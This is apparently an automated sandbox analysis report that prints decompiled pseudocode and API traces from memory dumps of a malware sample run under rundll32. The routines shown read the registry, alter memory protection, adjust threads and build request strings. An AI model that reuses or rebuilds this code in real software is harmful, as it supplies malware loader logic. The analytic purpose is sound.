Opcode ID: 50defc02f0d409b3a2d553344dcdf934fd260b33a96e6c135069189a26402da4
Instruction ID: b7d40e9f2f175282d1cb1fc6428c9e2ed77a94a8cfa7fc914d0d936ac3b3a856
Opcode Fuzzy Hash: 50defc02f0d409b3a2d553344dcdf934fd260b33a96e6c135069189a26402da4
Instruction Fuzzy Hash: 28312A72E40219EFCB01CF95CD89BEEB7B9FB08304F6041A9E905AB240D771AA15DB90

Uniqueness

Uniqueness Score: -1.00%

Function 04441E1E, Relevance: 6.1, APIs: 4, Instructions: 87
sleepCOMMON

Download Yara Rule

C-Code - Quality: 41%

			E04441E1E(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t20;
				void* _t26;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t20 = E044447C3(__ecx,  &_v32); // executed
				_t38 = _t20;
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t23 =  &(_t39[1]);
						if(_t39[1] != 0) {
							E04444868(_t23);
						}
					}
					return _t38;
				}
				_t26 = E04443002(0x40,  &_v16); // executed
				if(_t26 != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0x444a2f8, 1, 0,  *0x444a394);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8); // executed
					CloseHandle(_t40);
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E044419CE(_t36); // executed
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E04445B1E(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E04442011(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E04445094( &_v32, _t39);
					goto L13;
				}
			}

0x04441e1e
0x04441e2b
0x04441e31
0x04441e32
0x04441e33
0x04441e34
0x04441e35
0x04441e39
0x04441e40
0x04441e45
0x04441e49
0x04441ed1
0x04441ed1
0x04441ed4
0x04441ed6
0x04441ede
0x04441ee4
0x04441ee7
0x04441ee7
0x04441ee4
0x04441ef2
0x04441ef2
0x04441e55
0x04441e5c
0x04441e5e
0x04441e5e
0x04441e75
0x04441e79
0x04441e7c
0x04441e87
0x04441e8e
0x04441e8e
0x04441e9a
0x04441e9b
0x04441ea9
0x04441e9d
0x04441e9d
0x04441e9e
0x04441e9f
0x04441ea0
0x04441ea1
0x04441ea2
0x04441ea2
0x04441eae
0x04441eb3
0x04441eb5
0x04441eb7
0x04441eb7
0x04441ebe
0x00000000
0x04441ec0
0x04441ec0
0x04441ecd
0x00000000
0x04441ecd

APIs

CreateEventA.KERNEL32(0444A2F8,00000001,00000000,00000040,?,?,74B5F710,00000000,74B5F730,?,?,?,?,0444775B,?,00000001), ref: 04441E6F
SetEvent.KERNEL32(00000000,?,?,?,?,0444775B,?,00000001,044464F7,00000002,?,?,044464F7), ref: 04441E7C
Sleep.KERNELBASE(00000BB8,?,?,?,?,0444775B,?,00000001,044464F7,00000002,?,?,044464F7), ref: 04441E87
CloseHandle.KERNEL32(00000000,?,?,?,?,0444775B,?,00000001,044464F7,00000002,?,?,044464F7), ref: 04441E8E

Part of subcall function 044419CE: RegOpenKeyExA.KERNELBASE(80000003,00000000,00000000,00020019,?,00000000,00000000,?,?,?,?,?,04441EAE,?), ref: 044419F4
Part of subcall function 044419CE: RegEnumKeyExA.KERNELBASE(?,?,?,04441EAE,00000000,00000000,00000000,00000000,00000104,00000000,?,?,?,?,?,04441EAE), ref: 04441A3B
Part of subcall function 044419CE: WaitForSingleObject.KERNEL32(00000000,?,?,?,04441EAE,?,04441EAE,?,?,?,?,?,04441EAE,?), ref: 04441AA8
Part of subcall function 044419CE: RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,04441EAE,?,?,?,?,?,0444775B,?), ref: 04441AD0

Memory Dump Source

Source File: 0000001C.00000002.732318485.0000000004441000.00000020.00000001.sdmp, Offset: 04440000, based on PE: true

Associated: 0000001C.00000002.732309389.0000000004440000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732341694.0000000004449000.00000002.00000001.sdmp Download File
Associated: 0000001C.00000002.732352113.000000000444A000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732361052.000000000444C000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_4440000_rundll32.jbxd

Similarity

API ID: CloseEvent$CreateEnumHandleObjectOpenSingleSleepWait
String ID:
API String ID: 891522397-0
Opcode ID: 99219818c46b1a947035746f4403e6cf894c0615be55778cb1d7470757ac2882
Instruction ID: 59321269c5cfb54b567de2216979f7e9bc75a4bc543dbad1ff03eeb458a0d29c
Opcode Fuzzy Hash: 99219818c46b1a947035746f4403e6cf894c0615be55778cb1d7470757ac2882
Instruction Fuzzy Hash: 1F21387AE00219ABFF20AFE584889EF776DEBC4354B15442BEA11A7100DB75BE85C760

Uniqueness

Uniqueness Score: -1.00%

Function 04446184, Relevance: 6.1, APIs: 4, Instructions: 80
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E04446184(int _a4, int _a8, void* _a12, short* _a16, char** _a20, intOrPtr* _a24) {
				long _t26;
				intOrPtr* _t38;
				char* _t42;
				long _t43;

				if(_a4 == 0) {
					L2:
					_t26 = RegOpenKeyW(_a8, _a12,  &_a12); // executed
					_t43 = _t26;
					if(_t43 == 0) {
						RegQueryValueExW(_a12, _a16, 0,  &_a8, 0,  &_a4); // executed
						if(_a4 == 0) {
							_t43 = 0xe8;
						} else {
							_t42 = E04441EF5(_a4);
							if(_t42 == 0) {
								_t43 = 8;
							} else {
								_t43 = RegQueryValueExW(_a12, _a16, 0,  &_a8, _t42,  &_a4);
								if(_t43 != 0) {
									E044430D1(_t42);
								} else {
									 *_a20 = _t42;
									_t38 = _a24;
									if(_t38 != 0) {
										 *_t38 = _a4;
									}
								}
							}
						}
						RegCloseKey(_a12);
					}
					L12:
					return _t43;
				}
				_t43 = E04443E68(_a4, _a8, _a12, _a16, _a20, _a24);
				if(_t43 == 0) {
					goto L12;
				}
				goto L2;
			}

0x04446190
0x044461b3
0x044461bd
0x044461c3
0x044461c7
0x044461df
0x044461e4
0x0444622c
0x044461e6
0x044461ee
0x044461f2
0x04446229
0x044461f4
0x04446206
0x0444620a
0x04446220
0x0444620c
0x0444620f
0x04446211
0x04446216
0x0444621b
0x0444621b
0x04446216
0x0444620a
0x044461f2
0x04446234
0x04446234
0x0444623b
0x04446241
0x04446241
0x044461a9
0x044461ad
0x00000000
0x00000000
0x00000000

APIs

RegOpenKeyW.ADVAPI32(80000002,05349DB4,05349DB4), ref: 044461BD
RegQueryValueExW.KERNELBASE(05349DB4,?,00000000,80000002,00000000,00000000,?,04445BFD,3D044490,80000002,04441EAE,00000000,04441EAE,?,05349DB4,80000002), ref: 044461DF
RegQueryValueExW.ADVAPI32(05349DB4,?,00000000,80000002,00000000,00000000,00000000,?,04445BFD,3D044490,80000002,04441EAE,00000000,04441EAE,?,05349DB4), ref: 04446204
RegCloseKey.ADVAPI32(05349DB4,?,04445BFD,3D044490,80000002,04441EAE,00000000,04441EAE,?,05349DB4,80000002,00000000,?), ref: 04446234

Part of subcall function 04443E68: SafeArrayDestroy.OLEAUT32(00000000), ref: 04443EED

Part of subcall function 044430D1: RtlFreeHeap.NTDLL(00000000,00000000,0444337A,00000000,00000000,?,00000000,?,?,?,?,?,04442534,00000000,?,00000001), ref: 044430DD

Memory Dump Source

Source File: 0000001C.00000002.732318485.0000000004441000.00000020.00000001.sdmp, Offset: 04440000, based on PE: true

Associated: 0000001C.00000002.732309389.0000000004440000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732341694.0000000004449000.00000002.00000001.sdmp Download File
Associated: 0000001C.00000002.732352113.000000000444A000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732361052.000000000444C000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_4440000_rundll32.jbxd

Similarity

API ID: QueryValue$ArrayCloseDestroyFreeHeapOpenSafe
String ID:
API String ID: 486277218-0
Opcode ID: 6ec1dd4111d8b479e536822c73b974374aca26b18ea9d20d58e751f63942a1b4
Instruction ID: 254a41e0712a99e107556c8f4a4afc706761c48c109455a388ca798eaac62112
Opcode Fuzzy Hash: 6ec1dd4111d8b479e536822c73b974374aca26b18ea9d20d58e751f63942a1b4
Instruction Fuzzy Hash: 7121607610011DBFEF11AF94DC80CEFBB69FB49350B058026FD14A7110DB35ADA19B90

Uniqueness

Uniqueness Score: -1.00%

Function 702E13A6, Relevance: 6.0, APIs: 4, Instructions: 30
threadCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E702E13A6(void* __ecx, intOrPtr _a4) {
				long _t3;
				int _t4;
				int _t9;
				void* _t13;

				_t13 = GetCurrentThread();
				_t3 = SetThreadAffinityMask(_t13, 1); // executed
				if(_t3 != 0) {
					SetThreadPriority(_t13, 0xffffffff); // executed
				}
				_t4 = E702E1E74(_a4); // executed
				_t9 = _t4;
				if(_t9 == 0) {
					SetThreadPriority(_t13, _t4);
				}
				asm("lock xadd [eax], ecx");
				return _t9;
			}

0x702e13af
0x702e13b4
0x702e13c2
0x702e13c7
0x702e13c7
0x702e13cd
0x702e13d2
0x702e13d6
0x702e13da
0x702e13da
0x702e13e4
0x702e13ed

APIs

GetCurrentThread.KERNEL32 ref: 702E13A9
SetThreadAffinityMask.KERNEL32(00000000,00000001), ref: 702E13B4
SetThreadPriority.KERNELBASE(00000000,000000FF), ref: 702E13C7
SetThreadPriority.KERNEL32(00000000,00000000,?), ref: 702E13DA

Memory Dump Source

Source File: 0000001C.00000002.736184582.00000000702E1000.00000020.00020000.sdmp, Offset: 702E0000, based on PE: true

Associated: 0000001C.00000002.736175790.00000000702E0000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.736193058.00000000702E3000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.736201655.00000000702E5000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.736210754.00000000702E6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_702e0000_rundll32.jbxd

Similarity

API ID: Thread$Priority$AffinityCurrentMask
String ID:
API String ID: 1452675757-0
Opcode ID: 0fce4a3ba43b3850f49356cce601d498174f2b44f3b1b8123e718844aa05a094
Instruction ID: 06936cfd89defc380a3800f3756c7cf6b346a56a67cc670e697b3aaec2e1110b
Opcode Fuzzy Hash: 0fce4a3ba43b3850f49356cce601d498174f2b44f3b1b8123e718844aa05a094
Instruction Fuzzy Hash: 0AE065333452116FD2116B2B8C8CF5F775CDF827317110275F521D22E0CB548D1195B5

Uniqueness

Uniqueness Score: -1.00%

Function 04445325, Relevance: 4.6, APIs: 3, Instructions: 94
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E04445325(void* __edx) {
				void* _v8;
				int _v12;
				WCHAR* _v16;
				void* __edi;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t32;
				intOrPtr _t35;
				void* _t37;
				intOrPtr _t38;
				intOrPtr _t42;
				void* _t45;
				void* _t50;
				void* _t52;

				_t50 = __edx;
				_v12 = 0;
				_t23 = E04443002(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0x444a2d4; // 0xefd5a8
				_t4 = _t24 + 0x444bd70; // 0x5349318
				_t5 = _t24 + 0x444bd18; // 0x4f0053
				_t26 = E04442E31( &_v16, _v8, _t5, _t4); // executed
				_t45 = _t26;
				if(_t45 == 0) {
					StrToIntExW(_v16, 0,  &_v12);
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0x444a2d4; // 0xefd5a8
						_t11 = _t32 + 0x444bd64; // 0x534930c
						_t48 = _t11;
						_t12 = _t32 + 0x444bd18; // 0x4f0053
						_t52 = E04443857(_t11, _t12, _t11);
						_t59 = _t52;
						if(_t52 != 0) {
							_t35 =  *0x444a2d4; // 0xefd5a8
							_t13 = _t35 + 0x444bdae; // 0x30314549
							_t37 = E04442E9F(_t48, _t50, _t59, _v8, _t52, _t13, 0x14); // executed
							if(_t37 == 0) {
								_t61 =  *0x444a2b4 - 6;
								if( *0x444a2b4 <= 6) {
									_t42 =  *0x444a2d4; // 0xefd5a8
									_t15 = _t42 + 0x444bbba; // 0x52384549
									E04442E9F(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
								}
							}
							_t38 =  *0x444a2d4; // 0xefd5a8
							_t17 = _t38 + 0x444bda8; // 0x5349350
							_t18 = _t38 + 0x444bd80; // 0x680043
							_t45 = E04443389(_v8, 0x80000001, _t52, _t18, _t17);
							HeapFree( *0x444a290, 0, _t52);
						}
					}
					HeapFree( *0x444a290, 0, _v16);
				}
				_t54 = _v8;
				if(_v8 != 0) {
					E04442011(_t54);
				}
				return _t45;
			}

0x04445325
0x04445335
0x04445338
0x0444533f
0x04445341
0x04445341
0x04445344
0x04445349
0x04445350
0x0444535d
0x04445362
0x04445366
0x04445374
0x04445382
0x04445386
0x04445417
0x04445417
0x0444538c
0x0444538c
0x04445391
0x04445391
0x04445398
0x044453a4
0x044453a6
0x044453a8
0x044453aa
0x044453b1
0x044453bc
0x044453c3
0x044453c5
0x044453cc
0x044453ce
0x044453d5
0x044453e0
0x044453e0
0x044453cc
0x044453e5
0x044453ea
0x044453f1
0x0444540f
0x04445411
0x04445411
0x044453a8
0x04445423
0x04445423
0x04445425
0x0444542a
0x0444542c
0x0444542c
0x04445437

APIs

StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,05349318,00000000,?,74B5F710,00000000,74B5F730), ref: 04445374
HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,05349350,?,00000000,30314549,00000014,004F0053,0534930C), ref: 04445411
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,044476F0), ref: 04445423

Memory Dump Source

Source File: 0000001C.00000002.732318485.0000000004441000.00000020.00000001.sdmp, Offset: 04440000, based on PE: true

Associated: 0000001C.00000002.732309389.0000000004440000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732341694.0000000004449000.00000002.00000001.sdmp Download File
Associated: 0000001C.00000002.732352113.000000000444A000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732361052.000000000444C000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_4440000_rundll32.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: dd7ae84c22ea9326af1ca4aab4cb5652aca3813fc1b06a0e954158b08f180795
Instruction ID: 08a5b0d4f225583aeb3dfc4788e44a4428c58ac973aa3dfd0b44c6f88f860a71
Opcode Fuzzy Hash: dd7ae84c22ea9326af1ca4aab4cb5652aca3813fc1b06a0e954158b08f180795
Instruction Fuzzy Hash: AF316175600158BFFF11DF90DD85E9E77BCEBC4705F1000AAB604AB251D675AE04EB50

Uniqueness

Uniqueness Score: -1.00%

Function 04442145, Relevance: 4.6, APIs: 3, Instructions: 82
memoryCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E04442145(intOrPtr* __eax, void* __ecx, void* __edx, long _a4, void** _a8, intOrPtr* _a12, char _a16) {
				void* _v8;
				char _v48;
				void* __edi;
				intOrPtr _t22;
				long _t29;
				intOrPtr _t33;
				intOrPtr* _t41;
				void* _t42;
				void* _t46;
				intOrPtr* _t47;
				void* _t48;
				intOrPtr _t50;

				_t46 = __edx;
				_t42 = __ecx;
				_t41 = _a16;
				_t47 = __eax;
				_t22 =  *0x444a2d4; // 0xefd5a8
				_t2 = _t22 + 0x444b671; // 0x657a6973
				wsprintfA( &_v48, _t2,  *__eax,  *_t41);
				if( *0x444a2a4 >= 5) {
					_push( &_a16);
					_push( &_v8);
					_push( &_v48);
					_t29 = _a4;
					"QQSUVWh"();
					L5:
					_a4 = _t29;
					L6:
					if(_a4 != 0) {
						L9:
						 *0x444a2a4 =  *0x444a2a4 + 1;
						L10:
						return _a4;
					}
					_t49 = _a16;
					 *_t47 = _a16;
					_t48 = _v8;
					 *_t41 = E0444307F(_t49, _t48); // executed
					_t33 = E044423FE(_t48, _t49); // executed
					if(_t33 != 0) {
						 *_a8 = _t48;
						 *_a12 = _t33;
						if( *0x444a2a4 < 5) {
							 *0x444a2a4 =  *0x444a2a4 & 0x00000000;
						}
						goto L10;
					}
					_a4 = 0xbf;
					E0444470B();
					HeapFree( *0x444a290, 0, _t48);
					goto L9;
				}
				_t50 =  *0x444a390; // 0x5348d6c
				if(RtlAllocateHeap( *0x444a290, 0, 0x800) == 0) {
					_a4 = 8;
					goto L6;
				}
				_t29 = E04443B3B(_a4, _t42, _t46, _t50,  &_v48,  &_v8,  &_a16, _t36);
				goto L5;
			}

0x04442145
0x04442145
0x0444214c
0x04442153
0x04442157
0x0444215c
0x04442167
0x04442177
0x044421ba
0x044421be
0x044421c2
0x044421c3
0x044421c6
0x044421cb
0x044421cb
0x044421ce
0x044421d2
0x0444220c
0x0444220c
0x04442212
0x04442219
0x04442219
0x044421d4
0x044421d7
0x044421d9
0x044421e6
0x044421e8
0x044421ef
0x04442226
0x0444222b
0x0444222d
0x0444222f
0x0444222f
0x00000000
0x0444222d
0x044421f1
0x044421f8
0x04442206
0x00000000
0x04442206
0x04442179
0x04442194
0x044421ae
0x00000000
0x044421ae
0x044421a7
0x00000000

APIs

wsprintfA.USER32 ref: 04442167
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 0444218C

Part of subcall function 04443B3B: GetTickCount.KERNEL32 ref: 04443B52
Part of subcall function 04443B3B: wsprintfA.USER32 ref: 04443B9F
Part of subcall function 04443B3B: wsprintfA.USER32 ref: 04443BBC
Part of subcall function 04443B3B: wsprintfA.USER32 ref: 04443BDC
Part of subcall function 04443B3B: wsprintfA.USER32 ref: 04443BFA
Part of subcall function 04443B3B: wsprintfA.USER32 ref: 04443C1D
Part of subcall function 04443B3B: wsprintfA.USER32 ref: 04443C3E

HeapFree.KERNEL32(00000000,0444773A,?,?,0444773A,?), ref: 04442206

Memory Dump Source

Source File: 0000001C.00000002.732318485.0000000004441000.00000020.00000001.sdmp, Offset: 04440000, based on PE: true

Associated: 0000001C.00000002.732309389.0000000004440000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732341694.0000000004449000.00000002.00000001.sdmp Download File
Associated: 0000001C.00000002.732352113.000000000444A000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732361052.000000000444C000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_4440000_rundll32.jbxd

Similarity

API ID: wsprintf$Heap$AllocateCountFreeTick
String ID:
API String ID: 2794511967-0
Opcode ID: 8265bc5b489953a89cf2437f1f0d8d695c2b996e16c602757b84579ffac40879
Instruction ID: b5ca4ddfa68eaed39faeea1d85fa001c00db30042560bc141cbe4b82aec8b5ff
Opcode Fuzzy Hash: 8265bc5b489953a89cf2437f1f0d8d695c2b996e16c602757b84579ffac40879
Instruction Fuzzy Hash: 81317A7A600109EFEF01DFA4D984E9A7BBCFF88345F004066F905A7600DB78EA15DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 044431A5, Relevance: 4.6, APIs: 3, Instructions: 73
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E044431A5(void* __eax, char* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16, void** _a20, intOrPtr* _a24) {
				char _v5;
				signed int _v12;
				intOrPtr _v16;
				char _t28;
				void* _t33;
				void* _t38;
				void* _t45;
				char* _t46;
				void* _t48;
				char* _t56;
				char* _t57;
				intOrPtr _t59;
				void* _t60;

				_t56 = _a4;
				_t60 = __eax;
				_v12 = 0xb;
				if(_t56 != 0 && __eax != 0) {
					_t5 = _t60 - 1; // -1
					_t46 =  &(_t56[_t5]);
					_t28 =  *_t46;
					_v5 = _t28;
					 *_t46 = 0;
					__imp__(_a8, _t45);
					_v16 = _t28;
					_t57 = StrStrA(_t56, _a8);
					if(_t57 != 0) {
						 *_t46 = _v5;
						_t33 = RtlAllocateHeap( *0x444a290, 0, _a16 + _t60); // executed
						_t48 = _t33;
						if(_t48 == 0) {
							_v12 = 8;
						} else {
							_t58 = _t57 - _a4;
							E04447801(_t57 - _a4, _a4, _t48);
							_t38 = E04447801(_a16, _a12, _t58 + _t48);
							_t53 = _v16;
							_t59 = _a16;
							E04447801(_t60 - _t58 - _v16, _t53 + _t58 + _a4, _t38 + _t59);
							 *_a20 = _t48;
							_v12 = _v12 & 0x00000000;
							 *_a24 = _t60 - _v16 + _t59;
						}
					}
				}
				return _v12;
			}

0x044431ad
0x044431b2
0x044431b4
0x044431bb
0x044431cd
0x044431cd
0x044431d1
0x044431d3
0x044431d6
0x044431d9
0x044431e2
0x044431ec
0x044431f0
0x044431f5
0x04443205
0x0444320b
0x0444320f
0x0444325e
0x04443211
0x04443211
0x0444321a
0x04443229
0x0444322e
0x0444323b
0x04443244
0x0444324f
0x04443256
0x0444325a
0x0444325a
0x0444320f
0x04443265
0x0444326c

APIs

lstrlen.KERNEL32(74B5F710,?,00000000,?,74B5F710), ref: 044431D9
StrStrA.SHLWAPI(00000000,?), ref: 044431E6
RtlAllocateHeap.NTDLL(00000000,?), ref: 04443205

Memory Dump Source

Source File: 0000001C.00000002.732318485.0000000004441000.00000020.00000001.sdmp, Offset: 04440000, based on PE: true

Associated: 0000001C.00000002.732309389.0000000004440000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732341694.0000000004449000.00000002.00000001.sdmp Download File
Associated: 0000001C.00000002.732352113.000000000444A000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732361052.000000000444C000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_4440000_rundll32.jbxd

Similarity

API ID: AllocateHeaplstrlen
String ID:
API String ID: 556738718-0
Opcode ID: 1adbab97e79ada38db34072cf4f610601dd2038cff18622943860fa6d9dfdf65
Instruction ID: 18ed1cdd32072353cc75429d227db49f6ea9c82b85cb4bb0bcd575a581b45d7e
Opcode Fuzzy Hash: 1adbab97e79ada38db34072cf4f610601dd2038cff18622943860fa6d9dfdf65
Instruction Fuzzy Hash: 92213B35A04149AFEF119F69C884B9EBBB5FF85714F058155EC04AB305C735EA15CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 702E14C6, Relevance: 4.6, APIs: 3, Instructions: 68
memoryCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E702E14C6(void* __eax, void* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				long _v20;
				int _t43;
				long _t54;
				signed int _t57;
				void* _t58;
				signed int _t60;

				_v12 = _v12 & 0x00000000;
				_t57 =  *0x702e41cc;
				_t58 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
				_v16 =  *(__eax + 6) & 0x0000ffff;
				VirtualProtect(_a4,  *(__eax + 0x54), _t57 - 0x69b25f40,  &_v20); // executed
				_v8 = _v8 & 0x00000000;
				if(_v16 <= 0) {
					L12:
					return _v12;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t60 = _v12;
					if(_t60 != 0) {
						goto L12;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						asm("bt [esi+0x24], eax");
						if(__eflags >= 0) {
							L8:
							_t54 = _t57 - 0x69b25f40;
							L9:
							_t43 = VirtualProtect( *((intOrPtr*)(_t58 + 0xc)) + _a4,  *(_t58 + 8), _t54,  &_v20); // executed
							if(_t43 == 0) {
								_v12 = GetLastError();
							}
							_v8 = _v8 + 1;
							_t58 = _t58 + 0x7c211d88 + _t57 * 0x28;
							if(_v8 < _v16) {
								continue;
							} else {
								goto L12;
							}
						}
						asm("bt [esi+0x24], eax");
						_t54 = _t57 - 0x69b25f42;
						if(__eflags >= 0) {
							goto L9;
						}
						goto L8;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						_t54 = _t57 - 0x69b25f24;
					} else {
						_t54 = _t57 - 0x69b25f04;
					}
					goto L9;
				}
				goto L12;
			}

0x702e14d0
0x702e14dd
0x702e14e3
0x702e14ef
0x702e14ff
0x702e1501
0x702e1509
0x702e159e
0x702e15a5
0x00000000
0x00000000
0x00000000
0x702e150f
0x702e150f
0x702e150f
0x702e1513
0x00000000
0x00000000
0x702e151f
0x702e1523
0x702e1547
0x702e154b
0x702e155f
0x702e155f
0x702e1565
0x702e1574
0x702e1578
0x702e1580
0x702e1580
0x702e1588
0x702e158b
0x702e1598
0x00000000
0x00000000
0x00000000
0x00000000
0x702e1598
0x702e1553
0x702e1557
0x702e155d
0x00000000
0x00000000
0x00000000
0x702e155d
0x702e152b
0x702e152f
0x702e1539
0x702e1531
0x702e1531
0x702e1531
0x00000000
0x702e152f
0x00000000

APIs

VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 702E14FF
VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 702E1574
GetLastError.KERNEL32 ref: 702E157A

Memory Dump Source

Source File: 0000001C.00000002.736184582.00000000702E1000.00000020.00020000.sdmp, Offset: 702E0000, based on PE: true

Associated: 0000001C.00000002.736175790.00000000702E0000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.736193058.00000000702E3000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.736201655.00000000702E5000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.736210754.00000000702E6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_702e0000_rundll32.jbxd

Similarity

API ID: ProtectVirtual$ErrorLast
String ID:
API String ID: 1469625949-0
Opcode ID: 74fd1cf1ce1810cfe7b3b9906898fced490a13e0347b40834a0312c255ec2e09
Instruction ID: 8fd5b7b0cfdd7906797fc1615664e15207c31bd32771570f3016a245d4880a4a
Opcode Fuzzy Hash: 74fd1cf1ce1810cfe7b3b9906898fced490a13e0347b40834a0312c255ec2e09
Instruction Fuzzy Hash: 6021827294020ADFCB15CF86C889AADF7B9FF48345F9044A9E103D7118E374AA64CF54

Uniqueness

Uniqueness Score: -1.00%

Function 702E15DD, Relevance: 4.6, APIs: 3, Instructions: 60
stringthreadCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E702E15DD() {
				char _v28;
				void _v44;
				char _v48;
				void* _v52;
				long _t23;
				int _t24;
				void* _t28;
				intOrPtr* _t30;
				signed int _t34;
				intOrPtr _t36;

				_push(0);
				_push(0x702e41c4);
				_push(1);
				_push( *0x702e41d0 + 0x702e5089);
				 *0x702e41c0 = 0xc;
				 *0x702e41c8 = 0; // executed
				L702E2090(); // executed
				_t34 = 6;
				memset( &_v44, 0, _t34 << 2);
				if(E702E1051( &_v44,  &_v28,  *0x702e41cc ^ 0xf7a71548) == 0) {
					_t23 = 0xb;
					L7:
					ExitThread(_t23);
				}
				_t24 = lstrlenW( *0x702e41b8);
				_t7 = _t24 + 2; // 0x2
				_t10 = _t24 + _t7 + 8; // 0xa
				_t28 = E702E1983(_t36, _t10,  &_v48,  &_v52); // executed
				if(_t28 == 0) {
					_t30 = _v52;
					 *_t30 = 0;
					if( *0x702e41b8 == 0) {
						 *((short*)(_t30 + 4)) = 0;
					} else {
						E702E212C(_t40, _t30 + 4);
					}
				}
				_t23 = E702E1FEC(_v44); // executed
				goto L7;
			}

0x702e15ef
0x702e15f0
0x702e15f5
0x702e15fd
0x702e15fe
0x702e1608
0x702e160e
0x702e1617
0x702e161c
0x702e163a
0x702e168f
0x702e1690
0x702e1691
0x702e1691
0x702e1642
0x702e1648
0x702e1656
0x702e165a
0x702e1661
0x702e1669
0x702e166d
0x702e166f
0x702e167e
0x702e1671
0x702e1677
0x702e1677
0x702e166f
0x702e1686
0x00000000

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(?,00000001,702E41C4,00000000), ref: 702E160E
lstrlenW.KERNEL32(?,?,?), ref: 702E1642

Part of subcall function 702E1983: GetSystemTimeAsFileTime.KERNEL32(?,00000002,00000000,?,?,?,?,?,?,?,?,?,702E165F,0000000A,?,?), ref: 702E1990
Part of subcall function 702E1983: _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 702E19A6
Part of subcall function 702E1983: _snwprintf.NTDLL ref: 702E19CB
Part of subcall function 702E1983: CreateFileMappingW.KERNELBASE(000000FF,702E41C0,00000004,00000000,?,?), ref: 702E19F0
Part of subcall function 702E1983: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,702E165F,0000000A,?), ref: 702E1A07
Part of subcall function 702E1983: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,702E165F,0000000A), ref: 702E1A3C

ExitThread.KERNEL32 ref: 702E1691

Memory Dump Source

Source File: 0000001C.00000002.736184582.00000000702E1000.00000020.00020000.sdmp, Offset: 702E0000, based on PE: true

Associated: 0000001C.00000002.736175790.00000000702E0000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.736193058.00000000702E3000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.736201655.00000000702E5000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.736210754.00000000702E6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_702e0000_rundll32.jbxd

Similarity

